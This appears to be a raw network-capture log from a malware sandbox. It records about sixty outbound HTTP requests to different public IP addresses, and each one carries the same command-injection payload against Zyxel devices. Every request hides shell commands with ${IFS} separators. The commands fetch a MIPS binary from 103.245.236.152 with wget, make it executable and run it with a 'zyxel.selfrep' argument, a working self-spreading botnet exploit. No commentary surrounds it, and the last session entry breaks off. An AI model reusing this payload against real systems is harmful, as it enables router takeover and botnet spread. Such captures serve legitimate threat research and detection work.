                                      Jan 14, 2024 15:50:43.219379902 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      3466192.168.2.1458720110.91.26.84443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:43.219436884 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      3467192.168.2.145782873.44.254.216443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:43.219482899 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      3468192.168.2.1459744222.186.59.253443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:43.219542027 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      3469192.168.2.144632075.165.26.39443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:43.219580889 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      3470192.168.2.143512832.254.117.77443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:43.219644070 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      3471192.168.2.1444280173.223.156.42443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:43.219702005 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      3472192.168.2.1433920112.115.7.253443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:43.219759941 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      3473192.168.2.1441242192.31.122.47443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:43.219806910 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      3474192.168.2.144254644.158.203.106443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:43.219857931 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      3475192.168.2.1447842139.64.82.173443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:43.219932079 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      3476192.168.2.1434322143.11.184.119443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:43.219985008 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      3477192.168.2.145168697.209.192.23443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:43.220033884 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      3478192.168.2.1449820169.147.224.98443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:43.220077038 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      3479192.168.2.1439120162.44.41.101443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:43.220156908 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      3480192.168.2.1435232156.245.101.48443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:43.220201015 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      3481192.168.2.145070650.251.185.227443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:43.220256090 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      3482192.168.2.1433330111.150.96.21443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:43.220309019 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      3483192.168.2.145225034.252.100.58443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:43.220364094 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      3484192.168.2.1447784210.246.245.147443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:43.220419884 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      3485192.168.2.1460064157.21.185.223443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:43.220489025 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      3486192.168.2.1443860213.171.21.223443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:43.220540047 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      3487192.168.2.145615071.135.223.1443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:43.220578909 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      3488192.168.2.1452870134.209.171.196443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:43.220623970 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      3489192.168.2.1451742166.171.252.196443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:43.220684052 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      3490192.168.2.144359291.91.5.35443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:43.220731020 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      3491192.168.2.1454162133.24.141.124443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:43.220765114 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      3492192.168.2.1446726211.246.239.112443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:43.220834970 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      3493192.168.2.1434676132.78.81.231443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:43.220870972 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      3494192.168.2.145896850.93.157.30443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:43.220926046 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      3495192.168.2.1440218128.182.205.92443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:43.220990896 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      3496192.168.2.145295696.142.102.19443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:43.221051931 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      3497192.168.2.1460920172.103.181.75443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:43.221122980 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      3498192.168.2.1438420129.109.112.226443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:43.221179962 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      3499192.168.2.146021299.5.138.146443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:43.221223116 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      3500192.168.2.144064482.244.9.64443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:43.221276045 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      3501192.168.2.1436768134.45.209.60443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:43.221357107 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      3502192.168.2.1456940164.26.87.192443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:43.221430063 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      3503192.168.2.1451278205.54.179.94443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:43.221477985 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      3504192.168.2.1445880197.26.110.129443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:43.221529007 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      3505192.168.2.1448990216.11.219.44443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:43.221569061 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      3506192.168.2.1444724151.229.161.5443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:43.221620083 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      3507192.168.2.1460378223.234.214.109443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:43.221683025 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      3508192.168.2.1449566139.210.129.208443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:43.221738100 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      3509192.168.2.144567098.249.141.19443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:43.221788883 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      3510192.168.2.1446308165.186.108.118443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:43.221851110 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      3511192.168.2.1439822203.253.0.17443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:43.221903086 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      3512192.168.2.143654847.28.56.188443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:43.221954107 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      3513192.168.2.144898095.94.223.39443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:43.222003937 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      3514192.168.2.145208637.27.196.115443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:43.222063065 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      3515192.168.2.144086825.126.90.111443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:43.222096920 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      3516192.168.2.1459874217.87.67.126443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:43.222174883 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      3517192.168.2.146040614.165.55.103443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:43.222223997 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      3518192.168.2.1439580189.162.107.92443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:43.222270012 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      3519192.168.2.1439792213.69.92.114443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:43.222312927 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      3520192.168.2.146031419.230.159.134443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:43.222352028 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      3521192.168.2.143821652.226.204.126443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:43.222398043 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      3522192.168.2.1459548190.223.10.209443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:43.222456932 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      3523192.168.2.1434650159.83.123.85443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:43.222501040 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      3524192.168.2.1440700175.32.15.167443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:43.222562075 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      3525192.168.2.1438258148.219.65.154443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:43.222635984 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      3526192.168.2.144823879.248.167.166443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:43.222656965 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      3527192.168.2.1447578153.82.75.107443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:43.222728968 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      3528192.168.2.1447370218.253.22.204443
                                      TimestampBytes transferredDirectionData
